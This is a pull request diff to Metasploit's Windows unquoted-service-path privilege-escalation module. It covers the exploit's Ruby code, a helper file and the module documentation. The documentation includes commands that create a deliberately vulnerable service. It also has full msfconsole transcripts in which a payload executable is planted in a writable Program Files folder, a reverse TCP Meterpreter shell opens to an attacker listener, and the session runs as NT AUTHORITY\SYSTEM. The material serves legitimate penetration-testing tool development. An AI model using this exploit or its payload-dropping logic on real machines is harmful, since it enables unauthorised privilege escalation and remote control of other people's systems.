### PR TITLE
unquoted service path tweaks

### DIFF
--- a/documentation/modules/exploit/windows/local/unquoted_service_path.md
+++ b/documentation/modules/exploit/windows/local/unquoted_service_path.md
@@ -12,11 +12,11 @@ As is documented in that write-up, if the executable is C:\Program Files\A Subfo
 
 Windows will attempt to run the following, in order.
 
-  1.  C:\Program.exe
-  2.  C:\Program Files\A.exe
-  3.  C:\Program Files\A Subfolder\B.exe
-  4.  C:\Program Files\A Subfolder\B Subfolder\C.exe
-  5.  C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe
+1.  C:\Program.exe
+2.  C:\Program Files\A.exe
+3.  C:\Program Files\A Subfolder\B.exe
+4.  C:\Program Files\A Subfolder\B Subfolder\C.exe
+5.  C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe
 
 To exploit this, we simply need to go in reverse order to see if we're able to write a payload to those locations.
 In Win7+ the deeper folders are more likely to succeed based on default Windows permissions for users.
@@ -44,38 +44,31 @@ This creates a vulnerable service, with `A Subfolder` being vulnerable to user w
 
 ## Verification Steps
 
-  1. Start msfconsole
-  2. Get a user shell
-  3. Do: ```use exploits/windows/local/unquoted_service_path```
-  4. Do: ```set session #```
-  5. Do: ```run```
-  6. You should get an elevated shell.
+1. Start msfconsole
+2. Get a user shell
+3. Do: `use exploits/windows/local/unquoted_service_path`
+4. Do: `set session #`
+5. Do: `run`
+6. You should get an elevated shell.
 
 ## Options
 
-### QUICK
-
-Only exploit the first exploitable service.  `false` will exploit all exploitable service. Default is `true`
-
 ## Scenarios
 
-### Windows 10 (16299) with Service Listed Above
-
+### Windows 10 21H2
 
 ```
 msf6 exploit(windows/local/unquoted_service_path) > set session 1
 session => 1
 msf6 exploit(windows/local/unquoted_service_path) > set verbose true
 verbose => true
-msf6 exploit(windows/local/unquoted_service_path) > set lhost 1.1.1.1
+msf6 exploit(windows/local/unquoted_service_path) > set lhost 192.168.159.128
 lhost => 1.1.1.1
 msf6 exploit(windows/local/unquoted_service_path) > set lport 9090
 lport => 9090
-msf6 exploit(windows/local/unquoted_service_path) > set quick false
-quick => false
 msf6 exploit(windows/local/unquoted_service_path) > exploit
 
-[*] Started reverse TCP handler on 1.1.1.1:9090 
+[*] Started reverse TCP handler on 192.168.159.128:9090 
 [*] Finding a vulnerable service...
 [-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
 [-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
@@ -90,91 +83,43 @@ msf6 exploit(windows/local/unquoted_service_path) > exploit
 [-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
 [-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
 [-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[+] Found potentially vulnerable service: Some Vulnerable Service - c:\Program Files\A Subfolder\B Subfolder\C Sub folder\SomeExecutable.exe (LocalSystem)
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[+] Found potentially vulnerable service: Vuln Service 1 - C:\Program Files\A Subfolder\B Subfolder\C Sub folder\SomeExecutable.exe (LocalSystem)
 [*]   Enumerating vulnerable paths
-[-]     c:\Program Files\A Subfolder\B Subfolder\ is not writable
-[+]     c:\Program Files\A Subfolder\ is writable
-[-]     c:\Program Files\ is not writable
-[-]     c:\ is not writable
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[*] Attempting exploitation of Some Vulnerable Service
-[*] Placing c:\Program Files\A Subfolder\B.exe for Some Vulnerable Service
-[*] Attempting to write 15872 bytes to c:\Program Files\A Subfolder\B.exe...
-[+] Manual cleanup of c:\Program Files\A Subfolder\B.exe is required due to a potential reboot for exploitation.
-[+] Successfully wrote payload
-[*] Launching service Some Vulnerable Service...
-[*] Manual cleanup of the payload file is required. Some Vulnerable Service will fail to start as long as the payload remains on disk.
-[-] Unable to restart service. System reboot or an admin restarting the service is required. Payload left on disk!!!
-[*] Waiting 303 seconds for shell to arrive
-[*] Sending stage (175686 bytes) to 2.2.2.2
-[*] Meterpreter session 2 opened (1.1.1.1:9090 -> 2.2.2.2:49891) at 2022-12-23 12:29:11 -0500
-[*] Attempting to delete payload: c:\Program Files\A Subfolder\B.exe
+[-]     C:\Program Files\A Subfolder\B Subfolder\ is not writable
+[+]     C:\Program Files\A Subfolder\ is writable
+[*]       Placing C:\Program Files\A Subfolder\B.exe for Vuln Service 1
+[*]       Attempting to write 15872 bytes to C:\Program Files\A Subfolder\B.exe...
+[+]       Successfully wrote payload
+[*] [Vuln Service 1] Restarting service
+[-] [Vuln Service 1] Restarting service failed: Could not open service. OpenServiceA error: FormatMessage failed to retrieve the error.
+[-]       Unable to restart service. System reboot or an admin restarting the service is required. Payload left on disk!!!
+[-]     C:\Program Files\ is not writable
+[-]     C:\ is not writable
+[+] Found potentially vulnerable service: Vuln Service 2 - C:\Program Files\D Subfolder\E Subfolder\F Sub folder\SomeExecutable.exe (LocalSystem)
+[*]   Enumerating vulnerable paths
+[-]     C:\Program Files\D Subfolder\E Subfolder\ is not writable
+[+]     C:\Program Files\D Subfolder\ is writable
+[*]       Placing C:\Program Files\D Subfolder\E.exe for Vuln Service 2
+[*]       Attempting to write 15872 bytes to C:\Program Files\D Subfolder\E.exe...
+[+]       Successfully wrote payload
+[*] [Vuln Service 2] Restarting service
+[*] Sending stage (175686 bytes) to 192.168.159.87
+[+] [Vuln Service 2] Service started
+[+] Deleted C:\Program Files\A Subfolder\B.exe
+[+] Deleted C:\Program Files\D Subfolder\E.exe
+[*] Meterpreter session 12 opened (192.168.159.128:9090 -> 192.168.159.87:57944) at 2023-01-05 09:46:38 -0500
 
 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
-```
-
-### Windows 10 (18363), QUICK set to true
-
-```
-sf6 exploit(multi/script/web_delivery) > use exploit/windows/local/unquoted_service_path
-[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
-msf6 exploit(windows/local/unquoted_service_path) > set lhost 2.2.2.2
-lhost => 2.2.2.2
-msf6 exploit(windows/local/unquoted_service_path) > set lport 7777
-lport => 7777
-msf6 exploit(windows/local/unquoted_service_path) > set session 1
-session => 1
-msf6 exploit(windows/local/unquoted_service_path) > set verbose true
-verbose => true
-msf6 exploit(windows/local/unquoted_service_path) > exploit
-
-[*] Started reverse TCP handler on 2.2.2.2:7777 
-[-] !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
-[-] QUICK option is enabled. If an exploitable service is not found, try 'set QUICK false'.
-[-] !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
-[*] Finding a vulnerable service...
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[+] Found potentially vulnerable service: NetTcpPortSharing - C:\WINDOWS\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMSvcHost.exe (NT AUTHORITY\LocalService)
-[*]   Enumerating vulnerable paths
-[-]     C:\WINDOWS\Microsoft.NET\Framework64\v3.0\ is not writable
-[-] Ignoring unexploitable service
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
-[+] Found potentially vulnerable service: Video Stream - C:\Program Files\VideoStream\1337 Log\checklog.exe (LocalSystem)
-[*]   Enumerating vulnerable paths
-[+]     C:\Program Files\VideoStream\ is writable
-[*] Attempting exploitation of Video Stream
-[*] Placing C:\Program Files\VideoStream\1337.exe for Video Stream
-[*] Attempting to write 15872 bytes to C:\Program Files\VideoStream\1337.exe...
-[+] Manual cleanup of C:\Program Files\VideoStream\1337.exe is required due to a potential reboot for exploitation.
-[+] Successfully wrote payload
-[*] Launching service Video Stream...
-[*] Manual cleanup of the payload file is required. Video Stream will fail to start as long as the payload remains on disk.
-[-] Unable to restart service. System reboot or an admin restarting the service is required. Payload left on disk!!!
-[*] Waiting 303 seconds for shell to arrive
-```
-
-Manually restart the service
-
-```
-[*] Sending stage (175686 bytes) to 1.1.1.1
-[*] Meterpreter session 2 opened (2.2.2.2:7777 -> 1.1.1.1:1727) at 2022-12-23 12:04:38 -0500
-[*] Attempting to delete payload: C:\Program Files\VideoStream\1337.exe
-
-meterpreter > getuid
-Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DESKTOP-81CEH16
+OS              : Windows 10 (10.0 Build 19044).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 3
+Meterpreter     : x86/windows
+meterpreter > 
 ```

--- a/documentation/modules/exploit/windows/local/unquoted_service_path.md
+++ b/documentation/modules/exploit/windows/local/unquoted_service_path.md
@@ -55,7 +55,7 @@ This creates a vulnerable service, with `A Subfolder` being vulnerable to user w
 
 ### QUICK
 
-If only the first service should attempt to be exploited, or all of them (sequentially).  Default is `true`
+If only the first service should attempt to be exploited, or all of them (sequentially).  Default is `false`
 
 ## Scenarios
 
@@ -110,13 +110,11 @@ msf5 exploit(windows/local/unquoted_service_path) > run
 [-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
 [-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
 [-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[+] Found vulnerable service: Some Vulnerable Service - C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe (LocalSystem)
+[+] Found potentially vulnerable service: Some Vulnerable Service - C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe (LocalSystem)
 [*] Attempting exploitation of Some Vulnerable Service
 [*] Enumerating vulnerable paths
-[*] Checking writability to: C:\Program Files\A Subfolder\B Subfolder
-[-] Path not writable
-[*] Checking writability to: C:\Program Files\A Subfolder
-[+] Path is writable
+[-] C:\Program Files\A Subfolder\B Subfolder not writable
+[+] C:\Program Files\A Subfolder is writable
 [*] Placing C:\Program Files\A Subfolder\B.exe for Some Vulnerable Service
 [*] Attempting to write 15872 bytes to C:\Program Files\A Subfolder\B.exe...
 [+] Manual cleanup of C:\Program Files\A Subfolder\B.exe is required due to a potential reboot for exploitation.

--- a/documentation/modules/exploit/windows/local/unquoted_service_path.md
+++ b/documentation/modules/exploit/windows/local/unquoted_service_path.md
@@ -35,8 +35,8 @@ This is sourced from @sumitvgithub's write-up
 With an administrator command prompt, execute the following:
 
 ```
-sc create "Some Vulnerable Service" binpath= "C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe" Displayname= "Vuln Service DP" start= auto
-mkdir "C:\Program Files\A Subfolder\B Subfolder\C Subfolder"
+sc create "Some Vulnerable Service" binpath= "C:\Program Files\A Subfolder\B Subfolder\C Sub folder\SomeExecutable.exe" Displayname= "Vuln Service DP" start= auto
+mkdir "C:\Program Files\A Subfolder\B Subfolder\C Sub folder"
 icacls "C:\Program Files\A Subfolder" /grant "BUILTIN\Users":W
 ```
 
@@ -49,13 +49,13 @@ This creates a vulnerable service, with `A Subfolder` being vulnerable to user w
   3. Do: ```use exploits/windows/local/unquoted_service_path```
   4. Do: ```set session #```
   5. Do: ```run```
-  6. You should either get a shell, or need to start a `multi/handler` and have the target restarted.
+  6. You should get an elevated shell.
 
 ## Options
 
 ### QUICK
 
-If only the first service should attempt to be exploited, or all of them (sequentially).  Default is `false`
+Only exploit the first exploitable service.  `false` will exploit all exploitable service. Default is `true`
 
 ## Scenarios
 
@@ -63,97 +63,118 @@ If only the first service should attempt to be exploited, or all of them (sequen
 
 
 ```
-[*] Using exploit/windows/local/unquoted_service_path
-resource (unquoted.rb)> setg verbose true
-verbose => true
-resource (unquoted.rb)> set payload windows/meterpreter/reverse_tcp
-payload => windows/meterpreter/reverse_tcp
-resource (unquoted.rb)> setg lhost 1.1.1.1
-lhost => 1.1.1.1
-resource (unquoted.rb)> setg lport 4444
-lport => 4444
-resource (unquoted.rb)> set session 1
+msf6 exploit(windows/local/unquoted_service_path) > set session 1
 session => 1
-msf5 exploit(windows/local/unquoted_service_path) > 
-[*] Sending stage (180291 bytes) to 2.2.2.2
-[*] Meterpreter session 1 opened (1.1.1.1:8888 -> 2.2.2.2:49696) at 2020-04-10 14:41:32 -0400
+msf6 exploit(windows/local/unquoted_service_path) > set verbose true
+verbose => true
+msf6 exploit(windows/local/unquoted_service_path) > set lhost 1.1.1.1
+lhost => 1.1.1.1
+msf6 exploit(windows/local/unquoted_service_path) > set lport 9090
+lport => 9090
+msf6 exploit(windows/local/unquoted_service_path) > set quick false
+quick => false
+msf6 exploit(windows/local/unquoted_service_path) > exploit
 
-msf5 exploit(windows/local/unquoted_service_path) > sessions -i 1
-[*] Starting interaction with 1...
-
-meterpreter > sysinfo
-Computer        : MSEDGEWIN10
-OS              : Windows 10 (10.0 Build 16299).
-Architecture    : x64
-System Language : en_US
-Domain          : WORKGROUP
-Logged On Users : 2
-Meterpreter     : x86/windows
-meterpreter > getuid
-Server username: MSEDGEWIN10\IEUser
-meterpreter > background
-[*] Backgrounding session 1...
-msf5 exploit(windows/local/unquoted_service_path) > run
-
-[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Started reverse TCP handler on 1.1.1.1:9090 
 [*] Finding a vulnerable service...
-[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[+] Found potentially vulnerable service: Some Vulnerable Service - C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe (LocalSystem)
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[+] Found potentially vulnerable service: Some Vulnerable Service - c:\Program Files\A Subfolder\B Subfolder\C Sub folder\SomeExecutable.exe (LocalSystem)
+[*]   Enumerating vulnerable paths
+[-]     c:\Program Files\A Subfolder\B Subfolder\ is not writable
+[+]     c:\Program Files\A Subfolder\ is writable
+[-]     c:\Program Files\ is not writable
+[-]     c:\ is not writable
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
 [*] Attempting exploitation of Some Vulnerable Service
-[*] Enumerating vulnerable paths
-[-] C:\Program Files\A Subfolder\B Subfolder not writable
-[+] C:\Program Files\A Subfolder is writable
-[*] Placing C:\Program Files\A Subfolder\B.exe for Some Vulnerable Service
-[*] Attempting to write 15872 bytes to C:\Program Files\A Subfolder\B.exe...
-[+] Manual cleanup of C:\Program Files\A Subfolder\B.exe is required due to a potential reboot for exploitation.
+[*] Placing c:\Program Files\A Subfolder\B.exe for Some Vulnerable Service
+[*] Attempting to write 15872 bytes to c:\Program Files\A Subfolder\B.exe...
+[+] Manual cleanup of c:\Program Files\A Subfolder\B.exe is required due to a potential reboot for exploitation.
 [+] Successfully wrote payload
 [*] Launching service Some Vulnerable Service...
 [*] Manual cleanup of the payload file is required. Some Vulnerable Service will fail to start as long as the payload remains on disk.
-[-] [Some Vulnerable Service] Unhandled error: Could not open service. OpenServiceA error: FormatMessage failed to retrieve the error.
-[-] Unable to restart service.  System reboot or an admin restarting the service is required.  Payload left on disk!!!
-[*] Exploit completed, but no session was created.
-```
+[-] Unable to restart service. System reboot or an admin restarting the service is required. Payload left on disk!!!
+[*] Waiting 303 seconds for shell to arrive
+[*] Sending stage (175686 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:9090 -> 2.2.2.2:49891) at 2022-12-23 12:29:11 -0500
+[*] Attempting to delete payload: c:\Program Files\A Subfolder\B.exe
 
-Manually start a handler, and restart the service (via GUI) to launch the exploit
-
-```
-msf5 exploit(windows/local/unquoted_service_path) > handler -p windows/meterpreter/reverse_tcp -H 1.1.1.1 -P 4444
-[*] Payload handler running as background job 1.
-
-[*] Started reverse TCP handler on 1.1.1.1:4444 
-msf5 exploit(windows/local/unquoted_service_path) > [*] Sending stage (180291 bytes) to 2.2.2.2
-[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49708) at 2020-04-10 14:43:26 -0400
-
-msf5 exploit(windows/local/unquoted_service_path) > sessions -i 2
-[*] Starting interaction with 2...
-
-meterpreter > sysinfo
-Computer        : MSEDGEWIN10
-OS              : Windows 10 (10.0 Build 16299).
-Architecture    : x64
-System Language : en_US
-Domain          : WORKGROUP
-Logged On Users : 2
-Meterpreter     : x86/windows
 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
 ```
 
-The most important part!!!
+### Windows 10 (18363), QUICK set to true
 
 ```
-meterpreter > rm "C:\\Program Files\\A Subfolder\\B.exe"
+sf6 exploit(multi/script/web_delivery) > use exploit/windows/local/unquoted_service_path
+[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf6 exploit(windows/local/unquoted_service_path) > set lhost 2.2.2.2
+lhost => 2.2.2.2
+msf6 exploit(windows/local/unquoted_service_path) > set lport 7777
+lport => 7777
+msf6 exploit(windows/local/unquoted_service_path) > set session 1
+session => 1
+msf6 exploit(windows/local/unquoted_service_path) > set verbose true
+verbose => true
+msf6 exploit(windows/local/unquoted_service_path) > exploit
 
+[*] Started reverse TCP handler on 2.2.2.2:7777 
+[-] !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+[-] QUICK option is enabled. If an exploitable service is not found, try 'set QUICK false'.
+[-] !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+[*] Finding a vulnerable service...
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[+] Found potentially vulnerable service: NetTcpPortSharing - C:\WINDOWS\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMSvcHost.exe (NT AUTHORITY\LocalService)
+[*]   Enumerating vulnerable paths
+[-]     C:\WINDOWS\Microsoft.NET\Framework64\v3.0\ is not writable
+[-] Ignoring unexploitable service
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[+] Found potentially vulnerable service: Video Stream - C:\Program Files\VideoStream\1337 Log\checklog.exe (LocalSystem)
+[*]   Enumerating vulnerable paths
+[+]     C:\Program Files\VideoStream\ is writable
+[*] Attempting exploitation of Video Stream
+[*] Placing C:\Program Files\VideoStream\1337.exe for Video Stream
+[*] Attempting to write 15872 bytes to C:\Program Files\VideoStream\1337.exe...
+[+] Manual cleanup of C:\Program Files\VideoStream\1337.exe is required due to a potential reboot for exploitation.
+[+] Successfully wrote payload
+[*] Launching service Video Stream...
+[*] Manual cleanup of the payload file is required. Video Stream will fail to start as long as the payload remains on disk.
+[-] Unable to restart service. System reboot or an admin restarting the service is required. Payload left on disk!!!
+[*] Waiting 303 seconds for shell to arrive
+```
+
+Manually restart the service
+
+```
+[*] Sending stage (175686 bytes) to 1.1.1.1
+[*] Meterpreter session 2 opened (2.2.2.2:7777 -> 1.1.1.1:1727) at 2022-12-23 12:04:38 -0500
+[*] Attempting to delete payload: C:\Program Files\VideoStream\1337.exe
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
 ```

--- a/documentation/modules/exploit/windows/local/unquoted_service_path.md
+++ b/documentation/modules/exploit/windows/local/unquoted_service_path.md
@@ -40,6 +40,12 @@ mkdir "C:\Program Files\A Subfolder\B Subfolder\C Sub folder"
 icacls "C:\Program Files\A Subfolder" /grant "BUILTIN\Users":W
 ```
 
+If you want to allow the user to restart the service:
+```
+wmic useraccount get name,sid
+sc sdset "Some Vulnerable Service" D:(A;;RPWP;;;place-sid-here)
+```
+
 This creates a vulnerable service, with `A Subfolder` being vulnerable to user writes.
 
 ## Verification Steps

--- a/lib/msf/core/post/windows/services.rb
+++ b/lib/msf/core/post/windows/services.rb
@@ -186,7 +186,7 @@ module Msf
             begin
               return session.extapi.service.enumerate.each(&block)
             rescue Rex::Post::Meterpreter::RequestError => e
-              vprint_error("Request Error #{e} falling back to registry technique")
+              vprint_error("Request Error #{e} Falling back to registry technique")
             end
           end
 
@@ -260,7 +260,7 @@ module Msf
             begin
               return session.extapi.service.query(name)
             rescue Rex::Post::Meterpreter::RequestError => e
-              vprint_error("Request Error #{e} falling back to registry technique")
+              vprint_error("Request Error #{e} Falling back to registry technique")
             end
           end
 
@@ -337,7 +337,7 @@ module Msf
                 # Cant do remote registry changes at present
                 return false
               else
-                vprint_error("Request Error #{e} falling back to registry technique")
+                vprint_error("Request Error #{e} Falling back to registry technique")
               end
             end
           end
@@ -611,7 +611,7 @@ module Msf
             begin
               return session.extapi.service.enumerate
             rescue Rex::Post::Meterpreter::RequestError => e
-              vprint_error("Request Error #{e} falling back to registry technique")
+              vprint_error("Request Error #{e} Falling back to registry technique")
             end
           end
 

--- a/modules/exploits/windows/local/unquoted_service_path.rb
+++ b/modules/exploits/windows/local/unquoted_service_path.rb
@@ -10,8 +10,6 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::EXE
   include Msf::Post::File
   include Msf::Post::Windows::Services
-  include Msf::Exploit::Deprecated
-  moved_from 'exploits/windows/local/trusted_service_path'
 
   def initialize(info = {})
     super(
@@ -37,7 +35,6 @@ class MetasploitModule < Msf::Exploit::Local
           known as Unquoted Service Path.
 
           The service exploited won't start until the payload written to disk is removed.
-          Manual cleanup is required.
         },
         'References' => [
           ['URL', 'http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx'],
@@ -53,6 +50,7 @@ class MetasploitModule < Msf::Exploit::Local
         'Platform' => [ 'win'],
         'Targets' => [ ['Windows', {}] ],
         'SessionTypes' => [ 'meterpreter' ],
+        'DefaultOptions' => { 'WfsDelay' => 300 }, # give a long wait so the box/service can be rebooted
         'DefaultTarget' => 0,
         'Notes' => {
           'Stability' => [ CRASH_SERVICE_DOWN ],
@@ -62,12 +60,13 @@ class MetasploitModule < Msf::Exploit::Local
       )
     )
     register_options([
-      OptBool.new('QUICK', [ false, 'Stop at first vulnerable service found', false])
+      OptBool.new('QUICK', [ false, 'Stop at first vulnerable service found', true])
     ])
   end
 
   def check
-    services = enum_vuln_services(quick: datastore['QUICK'])
+    quick_banner
+    services = enum_vuln_services
     if services.empty?
       return CheckCode::Safe
     end
@@ -93,7 +92,7 @@ class MetasploitModule < Msf::Exploit::Local
   # C:\Program
   ###
 
-  def generate_folders(fpath, quick)
+  def generate_folders(fpath)
     potential_paths = []
     checked_paths = []
     fpath.reverse.each do |x|
@@ -105,18 +104,18 @@ class MetasploitModule < Msf::Exploit::Local
 
       checked_paths << path_no_file
       unless writable?(path_no_file)
-        vprint_error("#{path_no_file} not writable")
+        vprint_error("    #{path_no_file}\\ is not writable")
         next
       end
-      vprint_good("#{path_no_file} is writable")
+      vprint_good("    #{path_no_file}\\ is writable")
       # include file name for the path
       potential_paths << path
-      return potential_paths if quick
+      return potential_paths if datastore['QUICK']
     end
     potential_paths
   end
 
-  def enum_vuln_services(quick: false)
+  def enum_vuln_services
     vuln_services = []
 
     each_service do |service|
@@ -135,11 +134,24 @@ class MetasploitModule < Msf::Exploit::Local
       next if !cmd.split('\\').map { |p| true if p =~ / / }.include?(true)
 
       vprint_good("Found potentially vulnerable service: #{service[:name]} - #{cmd} (#{info[:startname]})")
-      vuln_services << [service[:name], cmd]
+      serv = {
+        'name' => service[:name],
+        'cmd' => cmd
+      }
+      fpath = cmd.split(' ')[0...-1] # cut off the .exe last portion
+      vprint_status('  Enumerating vulnerable paths')
+      serv['paths'] = generate_folders(fpath)
+
+      # don't bother saving if we didn't find any vuln paths
+      if serv['paths'].empty?
+        vprint_error('Ignoring unexploitable service')
+      else
+        vuln_services << serv
+      end
 
       # This process can be pretty damn slow.
       # Allow the user to just find one, and get the hell out.
-      break if !vuln_services.empty? && quick
+      break if !vuln_services.empty? && datastore['QUICK']
     end
 
     vuln_services
@@ -158,47 +170,55 @@ class MetasploitModule < Msf::Exploit::Local
     end
   end
 
+  def quick_banner
+    return unless datastore['QUICK']
+
+    print_error('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
+    print_error('QUICK option is enabled. If an exploitable service is not found, try \'set QUICK false\'.')
+    print_error('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
+  end
+
   def exploit
-    #
-    # Exploit the first service found
-    #
+    quick_banner
     print_status('Finding a vulnerable service...')
-    svrs_list = enum_vuln_services(quick: datastore['QUICK'])
+    svrs_list = enum_vuln_services
 
     fail_with(Failure::NotVulnerable, 'No service found with trusted path issues') if svrs_list.empty?
 
     svrs_list.each do |svrs|
-      print_status("Attempting exploitation of #{svrs[0]}")
-      svr_name = svrs[0]
-      fpath = svrs[1]
-      fpath = fpath.split(' ')[0...-1] # cut off the .exe last portion
-      vprint_status('Enumerating vulnerable paths')
-      potential_paths = generate_folders fpath, datastore['QUICK']
-
+      print_status("Attempting exploitation of #{svrs['name']}")
       #
       # Drop the malicious executable into the path
       #
-      # rubocop:disable Lint/UnreachableLoop
-      potential_paths.each do |path|
-        exe_path = "#{path}.exe"
-        print_status("Placing #{exe_path} for #{svr_name}")
-        exe = generate_payload_exe_service({ servicename: svr_name })
-        print_status("Attempting to write #{exe.length} bytes to #{exe_path}...")
-        write_file(exe_path, exe)
-        print_good("Manual cleanup of #{exe_path} is required due to a potential reboot for exploitation.")
+      svrs['paths'].each do |path|
+        @exe_path = "#{path}.exe"
+        print_status("Placing #{@exe_path} for #{svrs['name']}")
+        exe = generate_payload_exe_service({ servicename: svrs['name'] })
